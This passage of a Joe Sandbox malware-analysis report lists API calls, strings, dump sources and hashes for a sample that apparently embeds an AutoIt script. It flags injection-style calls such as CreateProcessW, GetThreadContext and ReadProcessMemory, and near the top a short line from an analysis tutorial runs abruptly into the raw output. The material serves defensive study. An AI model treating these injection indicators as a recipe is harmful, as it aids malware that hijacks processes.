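APIs
  • Part of subcall function 009622A0: Sleep.KERNELBASE(000001F4), ref: 009622B1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009624FF
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009F302F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009F3044
APIs
• OleInitialize.OLE32 ref: 00981388
"""
```

Feed the whole report text to parse_report and print flag(f) next to the first call's ref for each function; functions whose calls all come from the 00960000 dump (describe_dump reports rwx_private) deserve the first look, since that is where the unpacked injector lives.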
                        Strings
                        • Variable must be of type 'Object'., xrefs: 009D32B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable must be of type 'Object'.
                        • API String ID: 0-109567571
                        • Opcode ID: 631aa4a44caac55d832aebaded21327b1806e2837988296d4e7788383a15d7fd
                        • Instruction ID: a927caba3451c9947710eb344c2e01ddd275639f7041221442fa14dc3fb48100
                        • Opcode Fuzzy Hash: 631aa4a44caac55d832aebaded21327b1806e2837988296d4e7788383a15d7fd
                        • Instruction Fuzzy Hash: 61C2AD71A00205CFCB24EF98C8A0BADB7B5FF49310F24856AE916AB391D375ED41CB91
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009C33A2
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00983A04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_wcslen
                        • String ID: Line:
                        • API String ID: 2289894680-1585850449
                        • Opcode ID: f02dd03c5128b14d494082d90125cf302d8089f7f1d83ae9405b095422d86aad
                        • Instruction ID: 8440b27f93c684c4f6888cf1139866b9007cc40c3b3d8da7b0cf9a890ad43002
                        • Opcode Fuzzy Hash: f02dd03c5128b14d494082d90125cf302d8089f7f1d83ae9405b095422d86aad
                        • Instruction Fuzzy Hash: 3F31A171408300AAD725FB60DC45BEBB7DCAB80B20F00892EF59997291EB749A49C7C2
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 009A0668
                          • Part of subcall function 009A32A4: RaiseException.KERNEL32(?,?,?,009A068A,?,00A51444,?,?,?,?,?,?,009A068A,00981129,00A48738,00981129), ref: 009A3304
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 009A0685
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Exception@8Throw$ExceptionRaise
                        • String ID: Unknown exception
                        • API String ID: 3476068407-410509341
                        • Opcode ID: 63987d728e59babce66011a26d80d7fa43730bb7a31f74ad50bf3975254ea10f
                        • Instruction ID: 877ea1f27790be1ade6ea011a2a473e2c12b35b19bc1233ee1156dcfb12a507b
                        • Opcode Fuzzy Hash: 63987d728e59babce66011a26d80d7fa43730bb7a31f74ad50bf3975254ea10f
                        • Instruction Fuzzy Hash: D2F0F634D0020D77CF00B6A8E856E9EB76C6EC2354B604531B828D65D1EF71EA65C5C0
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009F302F
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009F3044
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        • Opcode ID: 93ed60f92d95c2a5b0d0c6e7980a351a1dbd11fb816d7ec1e911b1d04289380c
                        • Instruction ID: 9a1b68961e416a6b26187e4b75ffeb5dd950e09ec3240808dc00bb8c3de4cf53
                        • Opcode Fuzzy Hash: 93ed60f92d95c2a5b0d0c6e7980a351a1dbd11fb816d7ec1e911b1d04289380c
                        • Instruction Fuzzy Hash: 62D05EB654032877DA20E7E4AC0EFCB3A6CDB05760F0006A1B655E2091DAF09985CAD0
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A082F5
                        • TerminateProcess.KERNEL32(00000000), ref: 00A082FC
                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A084DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$CurrentFreeLibraryTerminate
                        • String ID:
                        • API String ID: 146820519-0
                        • Opcode ID: 0f273881d4430bbce442ff7ecde910f65f7809c1ea5f0b90d67759ed99b3630c
                        • Instruction ID: 2d3dca1ca44dd09374501095085485b8431805b4cfab087675a1bea53a731f91
                        • Opcode Fuzzy Hash: 0f273881d4430bbce442ff7ecde910f65f7809c1ea5f0b90d67759ed99b3630c
                        • Instruction Fuzzy Hash: 43128A71A083059FC714DF28D484B6ABBE1BF88318F04895DE8998B392DB35ED45CF96
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8988fa97faa82676f35d5cb7728323d140818e005969d0396274afb40ea12af
                        • Instruction ID: 8e46a4f7cc161f8a70984ec467673a950c03f53333387d995dab81566f8f621d
                        • Opcode Fuzzy Hash: f8988fa97faa82676f35d5cb7728323d140818e005969d0396274afb40ea12af
                        • Instruction Fuzzy Hash: 6D51B071D006199BCB21AFE4CA45FEEBFB9EF46330F160459F405A7291D7359901CB61
                        APIs
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00981BF4
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00981BFC
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00981C07
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00981C12
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00981C1A
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00981C22
                          • Part of subcall function 00981B4A: RegisterWindowMessageW.USER32(00000004,?,009812C4), ref: 00981BA2
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098136A
                        • OleInitialize.OLE32 ref: 00981388
                        • CloseHandle.KERNEL32(00000000,00000000), ref: 009C24AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        • Opcode ID: 524f81083c7d9c7628426b6c5c7610bb49d903d22f2a66e7bfc377619be806d7
                        • Instruction ID: fcb44e24441b34e39db6503841c8f647f4fc8ff28c5d99ff54fddd440242d44f
                        • Opcode Fuzzy Hash: 524f81083c7d9c7628426b6c5c7610bb49d903d22f2a66e7bfc377619be806d7
                        • Instruction Fuzzy Hash: 147188B49113008FC794EFF9A945BB53AE4FB88396754962AE40AC7361FB304887CF55
                        APIs
                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0098556D
                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0098557D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 3328b2ac0c1d91df6b00cda215390ce8c1b39eb5a3cf98b443caf01b6288f84d
                        • Instruction ID: d0cd5987ebd8febcff58d3818d9e5b11102389b93b960ffef3a00144dd87689e
                        • Opcode Fuzzy Hash: 3328b2ac0c1d91df6b00cda215390ce8c1b39eb5a3cf98b443caf01b6288f84d
                        • Instruction Fuzzy Hash: 36314971A00A09EFDB14DF68C880B99B7B6FB48314F158629F91997340D775FE98CB90
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,009B85CC,?,00A48CC8,0000000C), ref: 009B8704
                        • GetLastError.KERNEL32(?,009B85CC,?,00A48CC8,0000000C), ref: 009B870E
                        • __dosmaperr.LIBCMT ref: 009B8739
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                        • String ID:
                        • API String ID: 490808831-0
                        • Opcode ID: 056edbde636084b437eb45927fb763170576ff216f03f00e218a9c8ee05742c4
                        • Instruction ID: 81dfb9f7f7031f7b0e52e78edae8a4d56680117364680a687ac6056d4c9f3376
                        • Opcode Fuzzy Hash: 056edbde636084b437eb45927fb763170576ff216f03f00e218a9c8ee05742c4
                        • Instruction Fuzzy Hash: 8B014E32605720A6D664B374AB49BFF678D4BCA778F39011DF8148B1D2DEA1CC81C190
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,009F2CD4,?,?,?,00000004,00000001), ref: 009F2FF2
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F3006
                        • CloseHandle.KERNEL32(00000000,?,009F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F300D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: 8fb36017651820bf724b5baf22dc875865c2a1797cbec25d6cc861068b0b670c
                        • Instruction ID: db3400f59308c74d812ab7b86ff1751eb4b30b7265035fb5923480b44d78d283
                        • Opcode Fuzzy Hash: 8fb36017651820bf724b5baf22dc875865c2a1797cbec25d6cc861068b0b670c
                        • Instruction Fuzzy Hash: FDE086322C022477D2302795BC0DFDB3A1CD786B71F108210F729790D086A0160243A8
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 009917F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: CALL
                        • API String ID: 1385522511-4196123274
                        • Opcode ID: cd57f0ade303e14bc7281bd9d2148c505bedf78cd4f32a0aa575514064e5ebc2
                        • Instruction ID: 806f96a69fe22500487632e180f5019eb171a6b433cffbc48926f41726dd2d25
                        • Opcode Fuzzy Hash: cd57f0ade303e14bc7281bd9d2148c505bedf78cd4f32a0aa575514064e5ebc2
                        • Instruction Fuzzy Hash: DE227B706083029FCB14DF18C494B2ABBF5BF89314F29895DF4968B3A1D735E885CB92
                        APIs
                        • _wcslen.LIBCMT ref: 009F6F6B
                          • Part of subcall function 00984ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LibraryLoad_wcslen
                        • String ID: >>>AUTOIT SCRIPT<<<
                        • API String ID: 3312870042-2806939583
                        • Opcode ID: 6c80b3348d2d2c9170e8f2dbb493fd0f3a47b532b9b8f28d622612feef2e9f60
                        • Instruction ID: d616c102480d9e64557e4b32f36a59174a8a73d85725ff9e68016ff70ed1a49c
                        • Opcode Fuzzy Hash: 6c80b3348d2d2c9170e8f2dbb493fd0f3a47b532b9b8f28d622612feef2e9f60
                        • Instruction Fuzzy Hash: 5FB14A311082058FDB14EF60C491ABAB7E5AFD4314F14895DF5969B2A2EB30ED49CB92
                        APIs
                        • GetOpenFileNameW.COMDLG32(?), ref: 009C2C8C
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                          • Part of subcall function 00982DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00982DC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen
                        • String ID: X
                        • API String ID: 779396738-3081909835
                        • Opcode ID: 7c1c18529d7b9cf126316958ca09f9f39be2fb371541eacf9ed3ff7677da27ef
                        • Instruction ID: 17f0e6e01c506b4f12c835024bd5e3d25b6d23b94be763c6ba755ab8cb516238
                        • Opcode Fuzzy Hash: 7c1c18529d7b9cf126316958ca09f9f39be2fb371541eacf9ed3ff7677da27ef
                        • Instruction Fuzzy Hash: B221A571E002589FCF01EF94C845BEE7BFCAF89715F008059E405AB341DBB85A498FA2
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID: EA06
                        • API String ID: 2638373210-3962188686
                        • Opcode ID: 46f0d7e38552de842a05a1e758c33ea56f1a5cf3ff890760da14b5b26afff7f5
                        • Instruction ID: 7d9295e5fec15b953a35631a6d0328d12c529d256e99fa69d30fd9e80e319a4e
                        • Opcode Fuzzy Hash: 46f0d7e38552de842a05a1e758c33ea56f1a5cf3ff890760da14b5b26afff7f5
                        • Instruction Fuzzy Hash: 2901B5729042587EDF18C7A8C856FFEBBF8DB46301F00455AF152D2181E5B8E6088BA0
                        APIs
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00983908
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconNotifyShell_
                        • String ID:
                        • API String ID: 1144537725-0
                        • Opcode ID: 00df1ed409dcfb5bcdb84e95dcdca567a2791c60ed843d82569fb48e8d049375
                        • Instruction ID: bbcd000016774f0c8e0e2ed2095e7fdd57e682895aa0eec1e283f29b8ca0828b
                        • Opcode Fuzzy Hash: 00df1ed409dcfb5bcdb84e95dcdca567a2791c60ed843d82569fb48e8d049375
                        • Instruction Fuzzy Hash: 8831B470A04301DFD760EF64D894BA7BBE8FB49719F00492EF99A87350E771AA44CB52
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 00985773
                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 009C4052
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 1bc4413bf270cf6ca913c745f062503fc6e8ecf9bc972d32bddf1cce2ba8fdb3
                        • Instruction ID: 049f481e522462ef610982effd7e2963cbe2e27f67b339bf88e3d1c5439d9fcb
                        • Opcode Fuzzy Hash: 1bc4413bf270cf6ca913c745f062503fc6e8ecf9bc972d32bddf1cce2ba8fdb3
                        • Instruction Fuzzy Hash: E0019230285225B6E3305A6ACC0EFA77F98EF027B0F11C304BA9D6A1E0C7B45855CB90
                        APIs
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00989879,?,?,?), ref: 00986E33
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00989879,?,?,?), ref: 00986E69
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide
                        • String ID:
                        • API String ID: 626452242-0
                        • Opcode ID: 0e89d30ba686fdff5d599bb9a91c9a7a46b76893e3094b10c2f151e18c670c06
                        • Instruction ID: 881273b6437f3378af5c019a910de064305dee2fba2b8a062797c7552ddf42d1
                        • Opcode Fuzzy Hash: 0e89d30ba686fdff5d599bb9a91c9a7a46b76893e3094b10c2f151e18c670c06
                        • Instruction Fuzzy Hash: 5001F7753442007FEB18A7B9EC1BF7FBAADDBC5310F14413EB106DA2E2E960AD005620
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0098BB4E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID:
                        • API String ID: 1385522511-0
                        • Opcode ID: fc7944dde1176368261e37f3c570d97dd558b53741ae46ead8f5d78f733b32b8
                        • Instruction ID: b1162b4c47b6d32447966f3d8c9a8c278c78be63b8b4f38308b1b079d879a194
                        • Opcode Fuzzy Hash: fc7944dde1176368261e37f3c570d97dd558b53741ae46ead8f5d78f733b32b8
                        • Instruction Fuzzy Hash: 1532DC34A00209AFDB24EF54C894BBEB7B9FF85314F18805AE915AB361D778ED41CB91
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00961A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00961AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00961B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                        • Instruction ID: 2df4fcb5eefb26350e55948115ab85092107fd81b23907310716dd7d00e09faa
                        • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
